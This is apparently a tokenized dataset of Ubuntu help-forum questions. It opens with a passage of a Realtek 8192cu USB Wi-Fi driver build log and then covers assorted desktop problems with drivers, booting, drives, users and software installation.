rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/pci_ops_linux.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/usb_intf.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/mlme_linux.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/pci_intf.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/rtw_android.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/xmit_linux.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/usb_ops_linux.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/ioctl_cfg80211.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/ rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/hal_com.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/wlan_bssdef.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/cmd_osdep.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_recv.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_mlme_ext.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/wifi.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192c_led.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192d_recv.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/halpwrseqcmd.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/hal8192cphyreg.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/hal8192dphycfg.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192d_hal.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192c_dm.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192c_rf.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_android.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192c_recv.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/nic_spec.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/usb_osintf.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192d_dm.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_xmit.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192c_event.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_qos.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_pwrctrl.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192c_xmit.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192d_spec.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/osdep_ce_service.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/ieee80211.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/recv_osdep.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/drv_types_linux.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_efuse.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/hal8192cuhwimg.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/usb_ops.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_ht.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/ioctl_cfg80211.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/ethernet.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/mp_custom_oid.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_ioctl_rtl.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/hal8192duhwimg.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192c_spec.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_mlme.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/drv_types.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/hal8192dehwimg.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_sreset.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/ieee80211_ext.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/drv_types_ce.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/hal8192cphycfg.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192d_led.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/byteorder/ rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/byteorder/swab.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/byteorder/swabb.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/byteorder/big_endian.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/byteorder/little_endian.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/byteorder/generic.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_mp_ioctl.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/usb_ops_linux.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/hal8192cuhwimg_wowlan.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/hal8192cehwimg.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_p2p.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/pci_hal.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/drv_conf.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/usb_vendor_req.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/linux/ rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/linux/wireless.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/osdep_service.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/hal8192duhwimg_wowlan.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_ioctl_query.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_eeprom.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/drv_types_xp.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_byteorder.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192d_xmit.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_version.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192d_cmd.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_ioctl_set.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/h2clbk.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/pci_osintf.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_cmd.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192d_rf.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/pci_ops.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_tdls.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192c_cmd.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_event.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/mlme_osdep.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_debug.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_ap.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/osdep_intf.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/hal_intf.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/sta_info.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_iol.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_mp_phy_regdef.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_rf.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/usb_hal.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/autoconf.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_security.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_io.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/hal8192dphyreg.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_br_ext.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/circ_buf.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/basic_types.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192c_hal.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/ip.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_led.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/if_ether.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/xmit_osdep.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtl8192c_sreset.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_mp.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/rtw_ioctl.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/include/drv_types_sdio.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/ifcfg-wlan0 rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/makefile rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/kconfig rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/ rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/dm.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/hal_intf.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/ rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_cmd.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_phycfg.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_xmit.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_dm.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_mp.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_rxdesc.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_rf6052.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/ rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_led.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_halinit.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_recv.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/hal8192cuhwimg_wowlan.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_ops_ce.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/hal8192cuhwimg.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_ops_linux.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_xmit.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_ops_xp.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_sreset.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_hal_init.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/hal_com.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/dm.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/halpwrseqcmd.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/clean rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 authentication requested [ root ] for make clean : install.sh : 38 : [ : unexpected operator rm -fr *.mod.c *.mod .o ..cmd *.ko *~ rm .tmp_versions -fr ; rm module.symvers -fr rm -fr module.markers ; rm -fr modules.order cd core/efuse ; rm -fr *.mod.c *.mod .o ..cmd *.ko cd core ; rm -fr *.mod.c *.mod .o ..cmd *.ko cd hal/rtl8192c/usb ; rm -fr *.mod.c *.mod .o ..cmd *.ko cd hal/rtl8192c ; rm -fr *.mod.c *.mod .o ..cmd *.ko cd hal ; rm -fr *.mod.c *.mod .o ..cmd *.ko cd os_dep/linux ; rm -fr *.mod.c *.mod .o ..cmd *.ko cd os_dep ; rm -fr *.mod.c *.mod .o ..cmd *.ko authentication requested [ root ] for make driver : install.sh : 48 : [ : unexpected operator make arch=i386 cross_compile= -c /lib/modules/3.8.0-29-generic/build m=/home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 modules make [ 1 ] : entering directory /usr/src/linux-headers-3.8.0-29-generic' cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_cmd.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_security.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_debug.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_io.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ioctl_query.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ioctl_set.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ieee80211.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_mlme.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_mlme_ext.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_wlan_util.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_pwrctrl.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_rf.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_recv.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_sta_mgt.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ap.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_xmit.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_p2p.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_tdls.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_br_ext.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_iol.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_sreset.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/efuse/rtw_efuse.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/hal_intf.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/hal_com.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/dm.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_hal_init.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_phycfg.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_rf6052.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_dm.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_rxdesc.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_cmd.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_halinit.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_led.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_xmit.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_recv.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_ops_linux.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_sreset.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_xmit.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/hal8192cuhwimg.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/osdep_service.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/usb_intf.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/usb_ops_linux.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/ioctl_linux.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/xmit_linux.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/mlme_linux.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/recv_linux.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/ioctl_cfg80211.o cc [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/rtw_android.o ld [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/8192cu.o building modules , stage 2 . modpost 1 modules cc /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/8192cu.mod.o ld [ m ] /home/all/drivers/8192cu/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/8192cu.ko make [ 1 ] : leaving directory/usr/src/linux-headers-3.8.0-29-generic' # compile make driver ok ! ! # install.sh : 68 : [ : unexpected operator authentication requested [ root ] for remove driver : authentication requested [ root ] for insert driver : authentication requested [ root ] for install driver : install -p -m 644 8192cu.ko /lib/modules/3.8.0-29-generic/kernel/drivers/net/wireless/ /sbin/depmod -a 3.8.0-29-generic # the setup script is completed ! # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # restart . the current condition is that i can connect to my wifi router and can not use firefox to browse anything . ps : tl-wn823n is an realtek 8192cu my router is tenda fh303 www.tp-link.com . www.tenda.cn i use 12.04 in offline pc and no inet connection can be established beside tl-wn823n ... that 's why really need this one to be connected . i already read the following links and got stuck . http : //www.linux-hardware-guide.com/2013-04-21-tp-link-tl-wn823n-mini-wireless-n-usb-300mbps http : //forum.ubuntu-fr.org/viewtopic.php ? pid=13755671 # p13755671 tp-link wireless n usb ( tl-wn823n ) connection issues . compilation error when installing realtek 8192cu driver can not install the rtl8188c driver on 13.04 can not install the rtl8188c driver on 13.04 http : //ubuntuforums.org/showthread.php ? t=2090580 http : //ubuntuforums.org/showthread.php ? t=2104485 http : //ubuntuforums.org/showthread.php ? t=2119378 how can i resolve this ?
395180	how to manage usb powering for sleep mode ?	how to disable usb powering for sleep mode while on ac ? settings for each controller or each device would be nice , but i 'm glad to see even a global setting . if on ac , after my ubuntu turns asleep it leave an usb hub ( without external power to hub ) powered which makes a mouse and a keyboard dragging current ( well , not much but furthermore led lights are annoying ) . it is not needed since i 'm not going to use keyboard or mouse when system is sleeping and not reasonable since no mouse nor keyboard usage wakes the system up . in asleep mode while not on ac , hub is powered off ( desired situation ! ) so i 'm doing a lot of plugging in and out ( not desired situation ! ) .
395185	errors in photoshops cs6 in wine	i usually meet the errors that shown below when use photoshop cs6 , especially typing step backward several times.and i have to focus close it and restart the program , this was a bad experience . i just want to know if i forget configure something when i install or it is the bug of wine for photoshop cs6 ?
395186	unable to eject/safely unmount usb drive	so i 'm trying to safely remove this usb drive , because when i do n't it does not work properly . when i go on nautilus and try to eject it , i get this error message : error ejecting : eject exited with exit code 1 : eject : unable to eject , last error : invalid argument and when i try to safely remove it via nautilus or disk utility : error detaching : helper exited with exit code 1 : detaching device /dev/sdb usb device : /sys/devices/pci0000:00/0000:00:12.0/usb3/3-1 ) synchronize cache : failed : no such file or directory ( continuing despite synchronize cache failure . ) stop unit : failed : no such file or directory doing a file system check on disk utility returns file system is clean.. trying to unmount it via terminal returns this : ~sudo eject /dev/sdb eject : unable to eject , last error : invalid argument i 've tried to unmount it on windows ( dual boot system ) , but i simply got an error message saying that it was unable to eject it . no programs running or anything .
395190	install ubuntu on lenovo g580	can i install ubuntu on a lenovo g580 , but keeping windows 8 ? how ? the specs are : prossesor : intel® core™ i5-3210m ( 3m cache , 2.50 ghz ) ram : 4.0gb pc3-12800 ddr3 sdram 1600 mhz os : windows 8 64bits hdd : 720gb
395191	problem in deleting a user	i m trying to delete a user . i was logged in from root and tried a delete a existing user using userdel -r sammy ( sammy is the user name ) it is showing a error that the user is currently logged in but any other user exept of root is not logged in . how can i delete the user ? ?
395192	how to install java for eclipse europe cdt	i have eclipse europe cdt installed on my ubuntu system . i now want to add jdt to my eclipse so i can run java programs . i allready ran the command sudo apt-get eclipse-jdt and it says i allready have newest version . how can i make a java project in my eclipse ? i know it has something to do with letting eclipse point to the right directory , but i have no clue how i can achieve this .
395194	ubuntu 13.10 . ca n't run opengl ( driver issue ? )	so , i 've been trying to get cairo-dock to work with opengl , yet it does n't , from what i 've digged around it seems to be a problem with the integrated drivers , intel did release 4 days ago a new stack , but without a installer . i just bought this computer , it has a i5 4200m - hd graphics 4600 and nvidia geforce gt 740m ( does n't seem to be the problem ) . in sum do i 've to somehow install this new drivers ? wait for the installer ? is it a problem with something else ?
395196	how to recover the root password on ubuntu server	i lost my root/super user password on ubuntu server , i tried to boot in a `` recovery mode '' , and choosed `` drop to root shell '' , but it is always asks for : give root password for maintenance ( or type control-d to continue ) and i do n't remember it ? ! !
395197	nvidia quadro fx 770m driver on elitebook 8530w	i 've just installed ubuntu 12.04 for the second time . i 've tweaked all the settings except for the additional drivers page . the last time i did this , i ended up with an installation that could n't start . when i click on the additional drivers button , it comes up with a bunch of listed nvidia drivers . which one should i use for my nvidia quadro fx 770m ? edit : problem solved , i just checked and the drivers are already enabled .
395198	can not delete wired connection	i 'm trying to delete a wired connection from network manager in kubuntu saucy ( converted and upgraded from lubuntu raring ) . it asks me for confirmation , which i give , but the connection does n't get deleted . how do i delete this connection ? ubuntu always connects to it automatically instead of preferring the connection i created ( which is working )
395199	how do you install after download ?	after i download the ubuntu file how do i install on my desk top computer ? i am completely new to ubuntu .
395200	windows 7 and ubuntu wont boot after trying to boot ubuntu	i tried to boot ubuntu through a dvd disc because i forgot my password ubuntu started booting when all of a sudden there was a black screen with a lot of text in it which said failure and other stuff at the bottom ( i do n't have a picture or anything about what was written there ) so i have shut the computer down in order to try again but nor the ubuntu or my windows will load please help me i do n't know what to do its just a black screen all the time !
395201	can not access d drive	today i did a clean ubuntu installation by removing window 8 from my laptop . i thought that after installing ubuntu i will have no problem in acessing d drive , where i have all my important data.but now i am unable to mount d drive . it gives following error . ror mounting /dev/sda5 at /media/nitesh/data : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda5 '' `` /media/nitesh/data '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . now i dont have window 8 also to resume and shutdown windows fully.now is there any solution for it ?
395212	why environment variable disappears after terminal reopen ?	i 've tryed to add environment variable in terminal : loom @ loom : ~ $ export doom=/home/loom/doom/ loom @ loom : ~ $ echo $ doom bash : /home/loom/doom/ : is a directory then i 've closed terminal and reopened it . however , there is n't $ doom variable now . how to add environment variable via terminal ?
395213	can we push software to clients ?	we need htcondor to be installed on computers in network which is our own campus network for throughput computing , we need maximum nodes so we can do it in a better way . mentioned network have many computers which are desktops , laptops some are connected to lan and some connected through wlan . there are 3 networks faculty , students , and senior students but for simplicity i am assuming its just single network . and they have different operating systems ( windows 7 , windows 8 , ubuntu , windows xp ) but i am assuming all have ubuntu . so how we can somehow broadcast it in network and install on all computers or prompt a pop up to user for installation ? or install it anyway on machines , i have looked and only thing i could find is microsoft group policy to install software remotely but this article applies to only windows 2000 and its not cross platform either . how can i do that on cross platform or at least on ubuntu machines using ubuntu ? any suggestions ?
395215	ubuntu 13.10 is hanging and boot stucks up	after i updated the nvidia graphic drivers of geforce 8400gs to 33.182 whql driver , the ubuntu 13.10 stops booting up and gets stuck on boot please provide me drivers so that i can run my ubuntu 13.10 .
395218	cheese does n't record video from my webcam	cheese does n't record video from my webcam ... the picture freezes when i press the 'record a video ' button . if i stop the records , then try and click the record button again it crashes the application . i 'm trying to record video clips using my ms lifecam with cheese but it is n't working . i 'd really appreciate any help diagnosing and resolving the problem . it can capture photos fine . when i use lsusb i can see the camera is detected on the usb bus here : bus 001 device 002 : id 045e:0772 microsoft corp. lifecam studio i 'm running ubuntu 13.10 if that 's of any use to diagnose this issue ...
395226	need help regarding finding tools	when i type command find / -name ? ? .conf the output is a lot of files such as : find : /home/simmer/local/share/gvfs.metadata : permission denied do n't get the desired result , and if i use the same command with sudo sudo find : /home/simmer/local/share/gvfs.metadata then it shows the correct result . why is that so why i need sudo privileges for this ?
395231	ca n't continue after filling the `` who are you '' password window	i 'm using a usb to install 12.04.3 on my laptop and it seems to install all the way the process bar says its `` all most done '' i 'm filling my name and password but after it stop loading the files it wont let me continue . the continue button wont click i could go back but i cant continue and it wont reboot letting me know that it all install .
395236	booting ubuntu from 1 gb usb drive	in the tutorial it says i need at least a 2 gb usb drive to boot ubuntu from a thumb drive . i only have a 1 gb usb drive right now . the iso file is ~ 904,000 kb , which can be stored on the usb drive . i have tried putting it on the usb drive with the universal usb installer to no avail . it seems that this does not matter . i just received a new samsung windows 8 laptop , and it is not giving me the option of booting from the usb stick . i have turned off the 'fast-startup ' and from what i 've read this should have given me the option to boot from the usb stick . my end goal is to be able to dual boot both windows 8 and ubuntu on this laptop . i guess i am just looking for some advice from here . thanks guys .
